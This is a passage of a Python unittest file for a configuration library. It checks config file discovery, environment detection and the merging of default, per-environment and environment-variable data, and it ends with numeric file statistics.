config = module.Config(detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [default_config_file, env_variables_file]))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('development')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, development_config_file]))
config = module.Config('foo')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, foo_config_file]))
config = module.Config('production')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file, production_config_file]))
config = module.Config('xxx')
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(lambda x: x, []))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__files__), map(deepdict, [env_variables_file, default_config_file]))
del env['A1']
del env['A2']
del env['C2']
def test_config_files(self):
self.assertTrue(hasattr(module.Config(), '__config_files__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, [default_config_file]))
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('development')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, development_config_file]))
config = module.Config('foo')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, foo_config_file]))
config = module.Config('production')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file, production_config_file]))
config = module.Config('xxx')
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(lambda x: x, []))
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(map(deepdict, config.__config_files__), map(deepdict, [default_config_file]))
def test_default_config_file(self):
self.assertTrue(hasattr(module.Config(), '__default_config_file__'))
try:
del env['A1']
except:
pass
try:
del env['A2']
except:
pass
try:
del env['C2']
except:
pass
config = module.Config()
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config(path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config(path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config(path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config(path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('development', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('development', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('development', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('development', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('foo', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('foo', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('foo', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('foo', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('production', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('production', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('production', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('production', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx')
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('xxx', path = package_root_path)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('xxx', path = package_root_path, detect = True)
self.assertDeepEqual(config.__default_config_file__, None)
config = module.Config('xxx', path = fixture_foo_root_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx', path = fixture_foo_root_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx', path = fixture_foo_src_nested_path)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
config = module.Config('xxx', path = fixture_foo_src_nested_path, detect = True)
self.assertDeepEqual(deepdict(config.__default_config_file__), default_config_file)
def test_env_config_files(self):
    """`__env_config_files__` lists env config files only under the fixture paths.

    For the package root (no config directory) the list is empty; for the
    `foo` fixture root and its nested src path it matches `env_config_files`,
    regardless of the environment name passed and of `detect`.
    """
    self.assertTrue(hasattr(module.Config(), '__env_config_files__'))
    # `pop` with a default replaces the bare `try: del ... except: pass`
    # idiom, which silently swallowed every exception type.
    for key in ('A1', 'A2', 'C2'):
        env.pop(key, None)

    def check(config, expect_files):
        # Expected value is built fresh per call, exactly as the original
        # inline `map(...)` expressions were.
        if expect_files:
            expected = map(deepdict, env_config_files)
        else:
            expected = map(lambda x: x, [])
        self.assertDeepEqual(map(deepdict, config.__env_config_files__), expected)

    # Same construction order as the original hand-unrolled assertions.
    for env_name in (None, 'development', 'foo', 'production', 'xxx'):
        args = () if env_name is None else (env_name,)
        check(module.Config(*args), False)
        if env_name is None:
            # Only the no-environment case also exercised `detect` alone.
            check(module.Config(detect = True), False)
        check(module.Config(*args, path = package_root_path), False)
        check(module.Config(*args, path = package_root_path, detect = True), False)
        check(module.Config(*args, path = fixture_foo_root_path), True)
        check(module.Config(*args, path = fixture_foo_root_path, detect = True), True)
        check(module.Config(*args, path = fixture_foo_src_nested_path), True)
        check(module.Config(*args, path = fixture_foo_src_nested_path, detect = True), True)
def test_config(self):
    """A `Config` deep-equals its meta attributes plus the merged config data.

    Covers: default-only data, each named environment's overrides, custom
    environment-variable overrides (`A1`/`C2`), and the `bar`/`baz` fixtures
    with empty / missing `custom-environment-variables` files.
    """
    # `pop` with a default replaces the bare `try/except: pass` delete idiom.
    for key in ('A1', 'A2', 'C2'):
        env.pop(key, None)

    def meta(config):
        # The meta attributes every Config carries, exactly as keyed by `deepdict`.
        return {
            '__config_data__': config.__config_data__,
            '__config_directory_name__': config.__config_directory_name__,
            '__config_files__': config.__config_files__,
            '__config_path__': config.__config_path__,
            '__default_config_file__': config.__default_config_file__,
            '__env_config_file__': config.__env_config_file__,
            '__env_config_files__': config.__env_config_files__,
            '__env_variables_file__': config.__env_variables_file__,
            '__env__': config.__env__,
            '__files__': config.__files__,
            '__logger__': config.__logger__,
            '__path__': config.__path__,
            '__root_path__': config.__root_path__,
            '__silent__': config.__silent__,
        }

    def expect(config, data):
        # Full deep comparison: meta attributes plus the expected data keys.
        expected = meta(config)
        expected.update(data)
        self.assertDeepEqual(deepdict(config), deepdict(expected))

    def data_for(b2, c2, extra_key = None, a1 = 'DEFAULT 1'):
        # Expected merged config payload; only `b2`, `c2`, `a1` and the
        # env-specific marker key vary between environments.
        data = {
            'a1': a1,
            'a2': {
                'b1': [1, 2, 3],
                'b2': b2,
                'b3': {
                    'c1': 1,
                    'c2': c2,
                },
            },
        }
        if extra_key is not None:
            data[extra_key] = True
        return data

    expect(module.Config(path = fixture_foo_root_path),
           data_for(['foo', 'bar'], 'DEFAULT 2'))
    expect(module.Config('development', path = fixture_foo_root_path),
           data_for(['DEV 1'], 'DEV 2', 'some_key_only_for_dev'))
    expect(module.Config('foo', path = fixture_foo_root_path),
           data_for(['FOO 1'], 'FOO 2', 'some_key_only_for_foo'))
    expect(module.Config('production', path = fixture_foo_root_path),
           data_for(['PROD 1'], 'PROD 2', 'some_key_only_for_prod'))
    # Unknown environment falls back to default-only data.
    expect(module.Config('xxx', path = fixture_foo_root_path),
           data_for(['foo', 'bar'], 'DEFAULT 2'))
    # Custom environment variables override `a1` and `a2.b3.c2`.
    env['A1'] = CUSTOM_ENV.get('A1')
    env['A2'] = CUSTOM_ENV.get('A2')
    env['C2'] = CUSTOM_ENV.get('C2')
    expect(module.Config('foo', path = fixture_foo_root_path),
           data_for(['FOO 1'], env['C2'], 'some_key_only_for_foo', a1 = env['A1']))
    del env['A1']
    del env['A2']
    del env['C2']
    # NOTE: verify case of `custom-environment-variables` empty
    expect(module.Config('bar', path = fixture_bar_root_path, silent = False),
           data_for(['foo', 'bar'], 'DEFAULT 2'))
    # NOTE: verify case of `custom-environment-variables` non-existing
    expect(module.Config('baz', path = fixture_baz_root_path, silent = False), {})
def test_get_env(self):
    """`get_env` returns the explicit env argument, else the `PYTHON_ENV` value.

    With neither an explicit argument nor `ENV`/`PYTHON_ENV` set, it
    returns `None`.
    """
    self.assertTrue(hasattr(module.Config(), 'get_env'))
    # `pop` with a default replaces the bare `try/except: pass` delete idiom.
    env.pop('ENV', None)
    env.pop('PYTHON_ENV', None)
    # An explicitly passed environment name always wins.
    for name in ('development', 'foo', 'production'):
        config = module.Config(name)
        self.assertEqual(config.get_env(), name)
    # Without an explicit argument, `PYTHON_ENV` drives the detected environment.
    for name in ('development', 'foo', 'production'):
        env['PYTHON_ENV'] = name
        config = module.Config.create()
        self.assertEqual(config.get_env(), name)
    # With no argument and no env variables, no environment is detected.
    env.pop('ENV', None)
    env.pop('PYTHON_ENV', None)
    config = module.Config.create()
    self.assertEqual(config.get_env(), None)
def test_get(self):
    """`Config.get()` returns the meta attributes plus the merged config data.

    Also checks that named environments resolve an `__env_config_file__`
    dict whose `path` contains the environment name.
    """
    self.assertTrue(hasattr(module.Config(), 'get'))
    # `pop` with a default replaces the bare `try/except: pass` delete idiom.
    for key in ('A1', 'A2', 'C2'):
        env.pop(key, None)

    def meta(config):
        # The meta attributes every Config carries, exactly as keyed by `deepdict`.
        return {
            '__config_data__': config.__config_data__,
            '__config_directory_name__': config.__config_directory_name__,
            '__config_files__': config.__config_files__,
            '__config_path__': config.__config_path__,
            '__default_config_file__': config.__default_config_file__,
            '__env_config_file__': config.__env_config_file__,
            '__env_config_files__': config.__env_config_files__,
            '__env_variables_file__': config.__env_variables_file__,
            '__env__': config.__env__,
            '__files__': config.__files__,
            '__logger__': config.__logger__,
            '__path__': config.__path__,
            '__root_path__': config.__root_path__,
            '__silent__': config.__silent__,
        }

    def expect_get(config, data):
        expected = meta(config)
        expected.update(data)
        self.assertDeepEqual(deepdict(config.get()), deepdict(expected))

    def data_for(b2, c2, extra_key = None, a1 = 'DEFAULT 1'):
        # Expected merged config payload for one environment.
        data = {
            'a1': a1,
            'a2': {
                'b1': [1, 2, 3],
                'b2': b2,
                'b3': {
                    'c1': 1,
                    'c2': c2,
                },
            },
        }
        if extra_key is not None:
            data[extra_key] = True
        return data

    def assert_env_file(config, name):
        # A recognized environment resolves to a config-file record whose
        # path mentions the environment name.
        self.assertEqual(config.__env__, name)
        self.assertTrue(isinstance(config.__env_config_file__, dict))
        self.assertTrue(config.__env__ in config.__env_config_file__.path)

    config = module.Config(path = fixture_foo_root_path)
    expect_get(config, data_for(['foo', 'bar'], 'DEFAULT 2'))
    config = module.Config('development', path = fixture_foo_root_path)
    assert_env_file(config, 'development')
    expect_get(config, data_for(['DEV 1'], 'DEV 2', 'some_key_only_for_dev'))
    config = module.Config('foo', path = fixture_foo_root_path)
    assert_env_file(config, 'foo')
    expect_get(config, data_for(['FOO 1'], 'FOO 2', 'some_key_only_for_foo'))
    config = module.Config('production', path = fixture_foo_root_path)
    assert_env_file(config, 'production')
    expect_get(config, data_for(['PROD 1'], 'PROD 2', 'some_key_only_for_prod'))
    # Unknown environment falls back to default-only data (no env-file checks).
    config = module.Config('xxx', path = fixture_foo_root_path)
    expect_get(config, data_for(['foo', 'bar'], 'DEFAULT 2'))
    # Custom environment variables override `a1` and `a2.b3.c2`.
    env['A1'] = CUSTOM_ENV.get('A1')
    env['A2'] = CUSTOM_ENV.get('A2')
    env['C2'] = CUSTOM_ENV.get('C2')
    config = module.Config('foo', path = fixture_foo_root_path)
    expect_get(config, data_for(['FOO 1'], env['C2'], 'some_key_only_for_foo', a1 = env['A1']))
    del env['A1']
    del env['A2']
    del env['C2']
def test_keys(self):
    """`Config.keys()` lists meta keys, then data keys, in a fixed order.

    Every environment contributes `a1`/`a2`; named environments append
    their marker key (`some_key_only_for_*`).
    """
    self.assertTrue(hasattr(module.Config(), 'keys'))
    # `pop` with a default replaces the bare `try/except: pass` delete idiom.
    for key in ('A1', 'A2', 'C2'):
        env.pop(key, None)
    # Meta keys common to every Config instance, in expected order.
    meta_keys = [
        '__config_data__',
        '__config_directory_name__',
        '__config_files__',
        '__config_path__',
        '__default_config_file__',
        '__env_config_file__',
        '__env_config_files__',
        '__env_variables_file__',
        '__env__',
        '__files__',
        '__logger__',
        '__path__',
        '__root_path__',
        '__silent__',
    ]

    def expect_keys(config, extra):
        self.assertDeepEqual(config.keys(), meta_keys + ['a1', 'a2'] + extra)

    expect_keys(module.Config(path = fixture_foo_root_path), [])
    expect_keys(module.Config('development', path = fixture_foo_root_path),
                ['some_key_only_for_dev'])
    expect_keys(module.Config('foo', path = fixture_foo_root_path),
                ['some_key_only_for_foo'])
    expect_keys(module.Config('production', path = fixture_foo_root_path),
                ['some_key_only_for_prod'])
    # Unknown environment contributes no extra key.
    expect_keys(module.Config('xxx', path = fixture_foo_root_path), [])
    # Custom environment variables change values, not the key set.
    env['A1'] = CUSTOM_ENV.get('A1')
    env['A2'] = CUSTOM_ENV.get('A2')
    env['C2'] = CUSTOM_ENV.get('C2')
    expect_keys(module.Config('foo', path = fixture_foo_root_path),
                ['some_key_only_for_foo'])
    del env['A1']
    del env['A2']
    del env['C2']
def test_values(self):
    """`Config.values()` lists meta attribute values, then data values.

    Data values come from the per-environment expected config-data dicts;
    custom environment variables override `a1` and `a2.b3.c2`.
    """
    self.assertTrue(hasattr(module.Config(), 'values'))
    # `pop` with a default replaces the bare `try/except: pass` delete idiom.
    for key in ('A1', 'A2', 'C2'):
        env.pop(key, None)

    def meta_values(config):
        # Meta attribute values in the same order `values()` yields them.
        return [
            config.__config_data__,
            config.__config_directory_name__,
            config.__config_files__,
            config.__config_path__,
            config.__default_config_file__,
            config.__env_config_file__,
            config.__env_config_files__,
            config.__env_variables_file__,
            config.__env__,
            config.__files__,
            config.__logger__,
            config.__path__,
            config.__root_path__,
            config.__silent__,
        ]

    def expect_values(config, data_values):
        self.assertDeepEqual(config.values(), meta_values(config) + data_values)

    config = module.Config(path = fixture_foo_root_path)
    expect_values(config, [
        default_config_data['a1'],
        default_config_data['a2'],
    ])
    config = module.Config('development', path = fixture_foo_root_path)
    expect_values(config, [
        default_and_development_config_data['a1'],
        default_and_development_config_data['a2'],
        default_and_development_config_data['some_key_only_for_dev'],
    ])
    config = module.Config('foo', path = fixture_foo_root_path)
    expect_values(config, [
        default_and_foo_config_data['a1'],
        default_and_foo_config_data['a2'],
        default_and_foo_config_data['some_key_only_for_foo'],
    ])
    config = module.Config('production', path = fixture_foo_root_path)
    expect_values(config, [
        default_and_production_config_data['a1'],
        default_and_production_config_data['a2'],
        default_and_production_config_data['some_key_only_for_prod'],
    ])
    # Unknown environment falls back to default-only data.
    config = module.Config('xxx', path = fixture_foo_root_path)
    expect_values(config, [
        default_config_data['a1'],
        default_config_data['a2'],
    ])
    # Custom environment variables override `a1` and the nested `c2`.
    env['A1'] = CUSTOM_ENV.get('A1')
    env['A2'] = CUSTOM_ENV.get('A2')
    env['C2'] = CUSTOM_ENV.get('C2')
    config = module.Config('foo', path = fixture_foo_root_path)
    expect_values(config, [
        env['A1'],
        Config.merge(
            default_and_foo_config_data['a2'],
            {
                'b3': {
                    'c2': env['C2']
                },
            },
        ),
        default_and_foo_config_data['some_key_only_for_foo'],
    ])
    del env['A1']
    del env['A2']
    del env['C2']
def test_has(self):
    """`Config.has` reports key presence; only the active env's marker key exists."""
    self.assertTrue(hasattr(module.Config(), 'has'))
    marker_keys = (
        'some_key_only_for_dev',
        'some_key_only_for_foo',
        'some_key_only_for_prod',
    )
    # Which marker key (if any) each tested environment contributes.
    marker_for = {
        None: None,
        'development': 'some_key_only_for_dev',
        'foo': 'some_key_only_for_foo',
        'production': 'some_key_only_for_prod',
        'xxx': None,
    }

    def check(config, present_key):
        # `a1`/`a2` exist in every environment; marker keys only in their own;
        # unknown keys never.
        self.assertDeepEqual(config.has('a1'), True)
        self.assertDeepEqual(config.has('a2'), True)
        for key in marker_keys:
            self.assertDeepEqual(config.has(key), key == present_key)
        self.assertDeepEqual(config.has('xxx'), False)

    for env_name in (None, 'development', 'foo', 'production', 'xxx'):
        args = () if env_name is None else (env_name,)
        check(module.Config(*args, path = fixture_foo_root_path), marker_for[env_name])
    # Custom environment variables change values, not key presence.
    env['A1'] = CUSTOM_ENV.get('A1')
    env['A2'] = CUSTOM_ENV.get('A2')
    env['C2'] = CUSTOM_ENV.get('C2')
    check(module.Config('foo', path = fixture_foo_root_path), 'some_key_only_for_foo')
    del env['A1']
    del env['A2']
    del env['C2']
def test_class_create(self):
    """`Config.create` detects the environment from the `ENV` variable.

    No `ENV` means no detected environment (default data only); each named
    `ENV` merges its environment file; custom variables override values.
    """
    # `pop` with a default replaces the bare `try/except: pass` delete idiom.
    env.pop('ENV', None)
    self.assertEqual(env.get('ENV', None), None)
    for key in ('A1', 'A2', 'C2'):
        env.pop(key, None)

    def meta(config):
        # The meta attributes every Config carries, exactly as keyed by `deepdict`.
        return {
            '__config_data__': config.__config_data__,
            '__config_directory_name__': config.__config_directory_name__,
            '__config_files__': config.__config_files__,
            '__config_path__': config.__config_path__,
            '__default_config_file__': config.__default_config_file__,
            '__env_config_file__': config.__env_config_file__,
            '__env_config_files__': config.__env_config_files__,
            '__env_variables_file__': config.__env_variables_file__,
            '__env__': config.__env__,
            '__files__': config.__files__,
            '__logger__': config.__logger__,
            '__path__': config.__path__,
            '__root_path__': config.__root_path__,
            '__silent__': config.__silent__,
        }

    def expect(config, data):
        expected = meta(config)
        expected.update(data)
        self.assertDeepEqual(deepdict(config), deepdict(expected))

    def data_for(b2, c2, extra_key = None, a1 = 'DEFAULT 1'):
        # Expected merged config payload for one environment.
        data = {
            'a1': a1,
            'a2': {
                'b1': [1, 2, 3],
                'b2': b2,
                'b3': {
                    'c1': 1,
                    'c2': c2,
                },
            },
        }
        if extra_key is not None:
            data[extra_key] = True
        return data

    # No `ENV` variable: no environment detected, default data only.
    config = module.Config.create(path = fixture_foo_root_path)
    self.assertEqual(config.__env__, None)
    expect(config, data_for(['foo', 'bar'], 'DEFAULT 2'))
    # Each `ENV` value selects the matching environment config file;
    # an unknown value ('xxx') falls back to default data.
    cases = [
        ('development', data_for(['DEV 1'], 'DEV 2', 'some_key_only_for_dev')),
        ('foo', data_for(['FOO 1'], 'FOO 2', 'some_key_only_for_foo')),
        ('production', data_for(['PROD 1'], 'PROD 2', 'some_key_only_for_prod')),
        ('xxx', data_for(['foo', 'bar'], 'DEFAULT 2')),
    ]
    for name, data in cases:
        env['ENV'] = name
        self.assertEqual(env.get('ENV', None), name)
        config = module.Config.create(path = fixture_foo_root_path)
        self.assertEqual(config.__env__, name)
        expect(config, data)
    # Custom environment variables override `a1` and `a2.b3.c2`.
    env['A1'] = CUSTOM_ENV.get('A1')
    env['A2'] = CUSTOM_ENV.get('A2')
    env['C2'] = CUSTOM_ENV.get('C2')
    env['ENV'] = 'foo'
    self.assertEqual(env.get('ENV', None), 'foo')
    config = module.Config.create(path = fixture_foo_root_path)
    self.assertEqual(config.__env__, 'foo')
    expect(config, data_for(['FOO 1'], env['C2'], 'some_key_only_for_foo', a1 = env['A1']))
    del env['A1']
    del env['A2']
    del env['C2']
def test_config_attribute_get(self):
    """Placeholder for attribute-style read access on Config — not yet implemented."""
    pass
def test_config_attribute_set(self):
    """Placeholder for attribute-style write access on Config — not yet implemented."""
    pass
def test_config_attribute_del(self):
    """Placeholder for attribute deletion on Config — not yet implemented."""
    pass
def test_config_item_get(self):
    """Placeholder for item-style (``config[key]``) read access — not yet implemented."""
    pass
def test_config_item_set(self):
    """Placeholder for item-style (``config[key] = value``) write access — not yet implemented."""
    pass
def test_config_item_del(self):
    """Placeholder for item-style (``del config[key]``) deletion — not yet implemented."""
    pass
# =========================================
# MAIN
# --------------------------------------
if __name__ == '__main__':
    # Delegate to the project's test runner (``helper`` is imported elsewhere
    # in this file); runs all tests defined on TestCase.
    helper.run(TestCase)
| 35.769855
| 144
| 0.627517
| 8,804
| 83,773
| 5.242731
| 0.014425
| 0.062396
| 0.099443
| 0.070195
| 0.953225
| 0.933445
| 0.917434
| 0.89852
| 0.889573
| 0.880646
| 0
| 0.00702
| 0.256885
| 83,773
| 2,341
| 145
| 35.785135
| 0.734422
| 0.009168
| 0
| 0.868961
| 0
| 0
| 0.11646
| 0.032601
| 0
| 0
| 0
| 0
| 0.192633
| 1
| 0.015097
| false
